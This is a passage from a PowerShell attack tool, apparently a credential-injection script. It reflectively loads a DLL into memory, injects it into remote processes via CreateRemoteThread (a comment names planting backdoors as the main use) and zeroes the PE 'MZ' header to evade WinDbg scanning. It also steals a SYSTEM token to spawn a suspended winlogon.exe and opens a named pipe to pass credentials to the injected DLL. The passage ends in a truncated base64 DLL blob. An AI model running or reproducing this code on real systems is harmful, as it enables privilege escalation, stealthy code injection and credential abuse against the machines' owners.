already called and we can now return. If DLL, call user function.\n\t\t    $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n\t\t    if (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -eq [IntPtr]::Zero))\n\t\t    {\n\t\t\t    #########################################\n\t\t\t    ### YOUR CODE GOES HERE\n\t\t\t    #########################################\n\t            switch ($FuncReturnType)\n\t            {\n\t                'WString' {\n\t                    Write-Verbose \"Calling function with WString return type\"\n\t\t\t\t        [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName \"WStringFunc\"\n\t\t\t\t        if ($WStringFuncAddr -eq [IntPtr]::Zero)\n\t\t\t\t        {\n\t\t\t\t\t        Throw \"Couldn't find function address.\"\n\t\t\t\t        }\n\t\t\t\t        $WStringFuncDelegate = Get-DelegateType @() ([IntPtr])\n\t\t\t\t        $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate)\n\t\t\t\t        [IntPtr]$OutputPtr = $WStringFunc.Invoke()\n\t\t\t\t        $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr)\n\t\t\t\t        Write-Output $Output\n\t                }\n\n\t                'String' {\n\t                    Write-Verbose \"Calling function with String return type\"\n\t\t\t\t        [IntPtr]$StringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName \"StringFunc\"\n\t\t\t\t        if ($StringFuncAddr -eq [IntPtr]::Zero)\n\t\t\t\t        {\n\t\t\t\t\t        Throw \"Couldn't find function address.\"\n\t\t\t\t        }\n\t\t\t\t        $StringFuncDelegate = Get-DelegateType @() ([IntPtr])\n\t\t\t\t        $StringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($StringFuncAddr, $StringFuncDelegate)\n\t\t\t\t        [IntPtr]$OutputPtr = $StringFunc.Invoke()\n\t\t\t\t        $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($OutputPtr)\n\t\t\t\t        Write-Output $Output\n\t                }\n\n\t                'Void' {\n\t                    Write-Verbose \"Calling function with Void return type\"\n\t\t\t\t        [IntPtr]$VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName \"VoidFunc\"\n\t\t\t\t        if ($VoidFuncAddr -eq [IntPtr]::Zero)\n\t\t\t\t        {\n\t\t\t\t\t        Throw \"Couldn't find function address.\"\n\t\t\t\t        }\n\t\t\t\t        $VoidFuncDelegate = Get-DelegateType @() ([Void])\n\t\t\t\t        $VoidFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VoidFuncAddr, $VoidFuncDelegate)\n\t\t\t\t        $VoidFunc.Invoke() | Out-Null\n\t                }\n\t            }\n\t\t\t    #########################################\n\t\t\t    ### END OF YOUR CODE\n\t\t\t    #########################################\n\t\t    }\n\t\t    #For remote DLL injection, call a void function which takes no parameters\n\t\t    elseif (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -ne [IntPtr]::Zero))\n\t\t    {\n\t\t\t    $VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName \"VoidFunc\"\n\t\t\t    if (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero))\n\t\t\t    {\n\t\t\t\t    Throw \"VoidFunc couldn't be found in the DLL\"\n\t\t\t    }\n\t\t\t\n\t\t\t    $VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle\n\t\t\t    $VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle\n\t\t\t\n\t\t\t    #Create the remote thread, don't wait for it to return.. This will probably mainly be used to plant backdoors\n\t\t\t    $RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions\n\t\t    }\n\t\t\n\t\t    #Don't free a library if it is injected in a remote process\n\t\t    if ($RemoteProcHandle -eq [IntPtr]::Zero)\n\t\t    {\n\t\t\t    Invoke-MemoryFreeLibrary -PEHandle $PEHandle\n\t\t    }\n\t\t    else\n\t\t    {\n\t\t\t    #Just delete the memory allocated in PowerShell to build the PE before injecting to remote process\n\t\t\t    $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)\n\t\t\t    if ($Success -eq $false)\n\t\t\t    {\n\t\t\t\t    Write-Warning \"Unable to call VirtualFree on the PE's memory. Continuing anyways.\" -WarningAction Continue\n\t\t\t    }\n\t\t    }\n\t\t\n\t\t    Write-Verbose \"Done!\"\n\t    }\n\n\t    Main\n    }\n\n    #Main function to either run the script locally or remotely\n    Function Main\n    {\n\t    if (($PSCmdlet.MyInvocation.BoundParameters[\"Debug\"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters[\"Debug\"].IsPresent)\n\t    {\n\t\t    $DebugPreference  = \"Continue\"\n\t    }\n\t\n\t    Write-Verbose \"PowerShell ProcessID: $PID\"\n\t\n\t    [Byte[]]$PEBytes = $null\n\t\n        if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8)\n        {\n            $PEBytes = $Bytes64\n        }\n        else\n        {\n            $PEBytes = $Bytes32\n        }\n\t\n\t    #Verify the image is a valid PE file\n\t    $e_magic = ($PEBytes[0..1] | % {[Char] $_}) -join ''\n\n        if ($e_magic -ne 'MZ')\n        {\n            throw 'PE is not a valid PE file.'\n        }\n\n        # Remove 'MZ' from the PE file so that it cannot be detected by .imgscan in WinDbg\n\t    # TODO: Investigate how much of the header can be destroyed, I'd imagine most of it can be.\n        $PEBytes[0] = 0\n        $PEBytes[1] = 0\n\t\n\t    #Add a \"program name\" to exeargs, just so the string looks as normal as possible (real args start indexing at 1)\n\t    if ($ExeArgs -ne $null -and $ExeArgs -ne '')\n\t    {\n\t\t    $ExeArgs = \"ReflectiveExe $ExeArgs\"\n\t    }\n\t    else\n\t    {\n\t\t    $ExeArgs = \"ReflectiveExe\"\n\t    }\n\n\t    if ($ComputerName -eq $null -or $ComputerName -imatch \"^\\s*$\")\n\t    {\n\t\t    Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName)\n\t    }\n\t    else\n\t    {\n\t\t    Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName) -ComputerName $ComputerName\n\t    }\n    }\n\n    Main\n    }\n\n\n\n    #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/\n\tFunction Get-DelegateType\n\t{\n\t    Param\n\t    (\n\t        [OutputType([Type])]\n\t        \n\t        [Parameter( Position = 0)]\n\t        [Type[]]\n\t        $Parameters = (New-Object Type[](0)),\n\t        \n\t        [Parameter( Position = 1 )]\n\t        [Type]\n\t        $ReturnType = [Void]\n\t    )\n\n\t    $Domain = [AppDomain]::CurrentDomain\n\t    $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')\n\t    $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\n\t    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)\n\t    $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])\n\t    $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)\n\t    $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')\n\t    $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)\n\t    $MethodBuilder.SetImplementationFlags('Runtime, Managed')\n\t    \n\t    Write-Output $TypeBuilder.CreateType()\n\t}\n\n\n\t#Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/\n\tFunction Get-ProcAddress\n\t{\n\t    Param\n\t    (\n\t        [OutputType([IntPtr])]\n\t    \n\t        [Parameter( Position = 0, Mandatory = $True )]\n\t        [String]\n\t        $Module,\n\t        \n\t        [Parameter( Position = 1, Mandatory = $True )]\n\t        [String]\n\t        $Procedure\n\t    )\n\n\t    # Get a reference to System.dll in the GAC\n\t    $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |\n\t        Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }\n\t    $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')\n\t    # Get a reference to the GetModuleHandle and GetProcAddress methods\n\t    $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')\n\t    $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')\n\t    # Get a handle to the module specified\n\t    $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))\n\t    $tmpPtr = New-Object IntPtr\n\t    $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)\n\n\t    # Return the address of the function\n\t    Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))\n\t}\n\n    ###############################\n    #Win32Constants\n    ###############################\n    $Constants = @{\n        ACCESS_SYSTEM_SECURITY = 0x01000000\n        READ_CONTROL = 0x00020000\n        SYNCHRONIZE = 0x00100000\n        STANDARD_RIGHTS_ALL = 0x001F0000\n        TOKEN_QUERY = 8\n        TOKEN_ADJUST_PRIVILEGES = 0x20\n        ERROR_NO_TOKEN = 0x3f0\n        SECURITY_DELEGATION = 3\n        DACL_SECURITY_INFORMATION = 0x4\n        ACCESS_ALLOWED_ACE_TYPE = 0x0\n        STANDARD_RIGHTS_REQUIRED = 0x000F0000\n        DESKTOP_GENERIC_ALL = 0x000F01FF\n        WRITE_DAC = 0x00040000\n        OBJECT_INHERIT_ACE = 0x1\n        GRANT_ACCESS = 0x1\n        TRUSTEE_IS_NAME = 0x1\n        TRUSTEE_IS_SID = 0x0\n        TRUSTEE_IS_USER = 0x1\n        TRUSTEE_IS_WELL_KNOWN_GROUP = 0x5\n        TRUSTEE_IS_GROUP = 0x2\n        PROCESS_QUERY_INFORMATION = 0x400\n        TOKEN_ASSIGN_PRIMARY = 0x1\n        TOKEN_DUPLICATE = 0x2\n        TOKEN_IMPERSONATE = 0x4\n        TOKEN_QUERY_SOURCE = 0x10\n        STANDARD_RIGHTS_READ = 0x20000\n        TokenStatistics = 10\n        TOKEN_ALL_ACCESS = 0xf01ff\n        MAXIMUM_ALLOWED = 0x02000000\n        THREAD_ALL_ACCESS = 0x1f03ff\n        ERROR_INVALID_PARAMETER = 0x57\n        LOGON_NETCREDENTIALS_ONLY = 0x2\n        SE_PRIVILEGE_ENABLED = 0x2\n        SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x1\n        SE_PRIVILEGE_REMOVED = 0x4\n        CREATE_SUSPENDED = 0x4\n    }\n\n    $Win32Constants = New-Object PSObject -Property $Constants\n    ###############################\n\n\n    ###############################\n    #Win32Structures\n    ###############################\n\t#Define all the structures/enums that will be used\n\t#\tThis article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html\n\t$Domain = [AppDomain]::CurrentDomain\n\t$DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')\n\t$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\n\t$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)\n\t$ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]\n\n    #Struct STARTUPINFO\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('STARTUPINFO', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('cb', [UInt32], 'Public') | Out-Null\n\t$TypeBuilder.DefineField('lpReserved', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('lpDesktop', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('lpTitle', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwX', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwY', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwXSize', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwYSize', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwXCountChars', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwYCountChars', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwFillAttribute', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwFlags', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('wShowWindow', [UInt16], 'Public') | Out-Null\n    $TypeBuilder.DefineField('cbReserved2', [UInt16], 'Public') | Out-Null\n    $TypeBuilder.DefineField('lpReserved2', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('hStdInput', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('hStdOutput', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('hStdError', [IntPtr], 'Public') | Out-Null\n\t$STARTUPINFO = $TypeBuilder.CreateType()\n\n    #Struct PROCESS_INFORMATION\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('PROCESS_INFORMATION', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('hProcess', [IntPtr], 'Public') | Out-Null\n\t$TypeBuilder.DefineField('hThread', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwProcessId', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwThreadId', [UInt32], 'Public') | Out-Null\n\t$PROCESS_INFORMATION = $TypeBuilder.CreateType()\n    ###############################\n\n\n    ###############################\n    #Win32Functions\n    ###############################\n    $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess\n\t$OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])\n\t$OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)\n\n    $OpenProcessTokenAddr = Get-ProcAddress advapi32.dll OpenProcessToken\n\t$OpenProcessTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr].MakeByRefType()) ([Bool])\n\t$OpenProcessToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessTokenAddr, $OpenProcessTokenDelegate)    \n\n    $CreateProcessWithTokenWAddr = Get-ProcAddress advapi32.dll CreateProcessWithTokenW\n\t$CreateProcessWithTokenWDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([Bool])\n\t$CreateProcessWithTokenW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateProcessWithTokenWAddr, $CreateProcessWithTokenWDelegate)\n\n    $memsetAddr = Get-ProcAddress msvcrt.dll memset\n\t$memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr])\n\t$memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate)\n\n    $DuplicateTokenExAddr = Get-ProcAddress advapi32.dll DuplicateTokenEx\n\t$DuplicateTokenExDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [UInt32], [UInt32], [IntPtr].MakeByRefType()) ([Bool])\n\t$DuplicateTokenEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DuplicateTokenExAddr, $DuplicateTokenExDelegate)\n\n    $CloseHandleAddr = Get-ProcAddress kernel32.dll CloseHandle\n\t$CloseHandleDelegate = Get-DelegateType @([IntPtr]) ([Bool])\n\t$CloseHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseHandleAddr, $CloseHandleDelegate)\n\n    $LsaFreeReturnBufferAddr = Get-ProcAddress secur32.dll LsaFreeReturnBuffer\n\t$LsaFreeReturnBufferDelegate = Get-DelegateType @([IntPtr]) ([UInt32])\n\t$LsaFreeReturnBuffer = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LsaFreeReturnBufferAddr, $LsaFreeReturnBufferDelegate)\n\n    $GetProcessIdAddr = Get-ProcAddress Kernel32.dll GetProcessId\n\t$GetProcessIdDelegate = Get-DelegateType @([IntPtr]) ([UInt32])\n\t$GetProcessId = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcessIdAddr, $GetProcessIdDelegate)\n    ###############################\n\n\n    #Get the primary token for the specified processId\n    #This function is taken from my script Invoke-TokenManipulation\n    function Get-PrimaryToken\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [UInt32]\n            $ProcessId,\n\n            #Open the token with all privileges. Requires SYSTEM because some of the privileges are restricted to SYSTEM.\n            [Parameter()]\n            [Switch]\n            $FullPrivs\n        )\n\n        if ($FullPrivs)\n        {\n            $TokenPrivs = $Win32Constants.TOKEN_ALL_ACCESS\n        }\n        else\n        {\n            $TokenPrivs = $Win32Constants.TOKEN_ASSIGN_PRIMARY -bor $Win32Constants.TOKEN_DUPLICATE -bor $Win32Constants.TOKEN_IMPERSONATE -bor $Win32Constants.TOKEN_QUERY \n        }\n\n        $ReturnStruct = New-Object PSObject\n\n        $hProcess = $OpenProcess.Invoke($Win32Constants.PROCESS_QUERY_INFORMATION, $true, [UInt32]$ProcessId)\n        $ReturnStruct | Add-Member -MemberType NoteProperty -Name hProcess -Value $hProcess\n        if ($hProcess -eq [IntPtr]::Zero)\n        {\n            #If a process is a protected process it cannot be enumerated. This call should only fail for protected processes.\n            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            Write-Verbose \"Failed to open process handle for ProcessId: $ProcessId. ProcessName $((Get-Process -Id $ProcessId).Name). Error code: $ErrorCode . This is likely because this is a protected process.\"\n            return $null\n        }\n        else\n        {\n            [IntPtr]$hProcToken = [IntPtr]::Zero\n            $Success = $OpenProcessToken.Invoke($hProcess, $TokenPrivs, [Ref]$hProcToken)\n\n            #Close the handle to hProcess (the process handle)\n            if (-not $CloseHandle.Invoke($hProcess))\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Warning \"Failed to close process handle, this is unexpected. ErrorCode: $ErrorCode\"\n            }\n            $hProcess = [IntPtr]::Zero\n\n            if ($Success -eq $false -or $hProcToken -eq [IntPtr]::Zero)\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Warning \"Failed to get processes primary token. ProcessId: $ProcessId. ProcessName $((Get-Process -Id $ProcessId).Name). Error: $ErrorCode\"\n                return $null\n            }\n            else\n            {\n                $ReturnStruct | Add-Member -MemberType NoteProperty -Name hProcToken -Value $hProcToken\n            }\n        }\n\n        return $ReturnStruct\n    }\n\n\n    #A modified version of this function from my script Invoke-TokenManipulation\n    #Creates the process suspended. Returns the ProcessID of the created process\n    function Create-SuspendedWinLogon\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [IntPtr]\n            $hToken #The token to create the process with\n        )\n\n        $ProcessId = -1\n\n        #Duplicate the token so it can be used to create a new process\n        [IntPtr]$NewHToken = [IntPtr]::Zero\n        $Success = $DuplicateTokenEx.Invoke($hToken, $Win32Constants.MAXIMUM_ALLOWED, [IntPtr]::Zero, 3, 1, [Ref]$NewHToken)\n        if (-not $Success)\n        {\n            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            Write-Warning \"DuplicateTokenEx failed. ErrorCode: $ErrorCode\"\n        }\n        else\n        {\n            $StartupInfoSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$STARTUPINFO)\n            [IntPtr]$StartupInfoPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($StartupInfoSize)\n            $memset.Invoke($StartupInfoPtr, 0, $StartupInfoSize) | Out-Null\n            [System.Runtime.InteropServices.Marshal]::WriteInt32($StartupInfoPtr, $StartupInfoSize) #The first parameter (cb) is a DWORD which is the size of the struct\n\n            $ProcessInfoSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$PROCESS_INFORMATION)\n            [IntPtr]$ProcessInfoPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($ProcessInfoSize)\n\n            $ProcessNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni(\"$($env:windir)\\system32\\winlogon.exe\")\n\n            $Success = $CreateProcessWithTokenW.Invoke($NewHToken, 0x0, $ProcessNamePtr, [IntPtr]::Zero, $Win32Constants.CREATE_SUSPENDED, [IntPtr]::Zero, [IntPtr]::Zero, $StartupInfoPtr, $ProcessInfoPtr)\n            if ($Success)\n            {\n                #Free the handles returned in the ProcessInfo structure\n                $ProcessInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ProcessInfoPtr, [Type]$PROCESS_INFORMATION)\n\n                $ProcessId = $GetProcessId.Invoke($ProcessInfo.hProcess)\n\n                $CloseHandle.Invoke($ProcessInfo.hProcess) | Out-Null\n                $CloseHandle.Invoke($ProcessInfo.hThread) | Out-Null\n            }\n            else\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Warning \"CreateProcessWithTokenW failed. Error code: $ErrorCode\"\n            }\n\n            #Free StartupInfo memory and ProcessInfo memory\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($StartupInfoPtr)\n            $StartupInfoPtr = [Intptr]::Zero\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ProcessInfoPtr)\n            $ProcessInfoPtr = [IntPtr]::Zero\n            [System.Runtime.InteropServices.Marshal]::ZeroFreeGlobalAllocUnicode($ProcessNamePtr)\n            $ProcessNamePtr = [IntPtr]::Zero\n\n            #Close handle for the token duplicated with DuplicateTokenEx\n            $Success = $CloseHandle.Invoke($NewHToken)\n            $NewHToken = [IntPtr]::Zero\n            if (-not $Success)\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Warning \"CloseHandle failed to close NewHToken. ErrorCode: $ErrorCode\"\n            }\n\n            return $ProcessId\n        }\n    }\n\n\n    #Get the SYSTEM token and create a winlogon process with it, returns the process ID of the new WinLogon process\n    function Create-WinLogonProcess\n    {\n        if ([Environment]::UserName -ine \"SYSTEM\")\n        {\n            #First GetSystem. The script cannot enumerate all tokens unless it is system for some reason. Luckily it can impersonate a system token.\n            $systemTokenInfo = Get-PrimaryToken -ProcessId (Get-Process wininit | where {$_.SessionId -eq 0}).Id\n            if ($systemTokenInfo -eq $null -or $SystemTokenInfo.hProcToken -eq [IntPtr]::Zero)\n            {\n                Write-Warning \"Unable to get SYSTEM token\"\n            }\n            else\n            {\n                $ProcessId = Create-SuspendedWinLogon -hToken $SystemTokenInfo.hProcToken\n                if ($ProcessId -eq -1)\n                {\n                    Throw \"Unable to create suspended WinLogon process\"\n                }\n\n                Write-Verbose \"Created suspended winlogon process. ProcessId: $ProcessId\"\n                return $ProcessId\n            }\n        }\n    }\n\n\n    #Set up a named pipe to communicate with the injected DLL\n    function Create-NamedPipe\n    {\n        $PipeSecurity = new-object System.IO.Pipes.PipeSecurity\n        $AccessRule = New-Object System.IO.Pipes.PipeAccessRule( \"NT AUTHORITY\\SYSTEM\", \"ReadWrite\", \"Allow\" )\n        $PipeSecurity.AddAccessRule($AccessRule)\n        $Pipe=new-object System.IO.Pipes.NamedPipeServerStream(\"sqsvc\",\"InOut\",100, \"Byte\", \"None\", 1024, 1024, $PipeSecurity)\n\n        return $Pipe\n    }\n    \n\n    #Determine the parameterset being used to figure out if a new winlogon process needs to be created or not\n    if ($PsCmdlet.ParameterSetName -ieq \"NewWinLogon\")\n    {\n        if ([System.Diagnostics.Process]::GetCurrentProcess().SessionId -eq 0)\n        {\n            Write-Error \"NewWinLogon mode cannot be used when running in Session 0\" -ErrorAction Stop\n        }\n\n        #Start winlogon.exe as SYSTEM\n        $WinLogonProcessId = Create-WinLogonProcess\n        Write-Output \"Created winlogon process to call LsaLogonUser in. Kill ProcessID $WinLogonProcessId when done impersonating.\"\n        Write-Output \"Execute: Stop-Process $WinLogonProcessId -force\"\n    }\n    elseif ($PsCmdlet.ParameterSetName -ieq \"ExistingWinLogon\")\n    {\n        $WinLogonProcessId = (Get-Process -Name \"winlogon\"| Select-Object -first 1).Id\n    }\n\n    #Get a ushort representing the logontype\n    [Byte]$LogonTypeNum = 0x0\n    switch ($LogonType)\n    {\n        \"Interactive\" {$LogonTypeNum = 2}\n        \"NetworkCleartext\" {$LogonTypeNum = 8}\n        \"RemoteInteractive\" {$LogonTypeNum = 10}\n    }\n\n    $AuthPackageNum = 0\n    #Get a ushort representing the authentication package to use\n    switch ($AuthPackage)\n    {\n        \"Msv1_0\" {$AuthPackageNum = 1}\n        \"Kerberos\" {$AuthPackageNum = 2}\n    }\n\n\n    #Main\n    try\n    {\n        $Pipe = Create-NamedPipe\n\n        #Reflectively inject a DLL in to the new winlogon process which will receive credentials and call LsaLogonUser from within winlogon.exe\n        $Logon32Bit_Base64 = \"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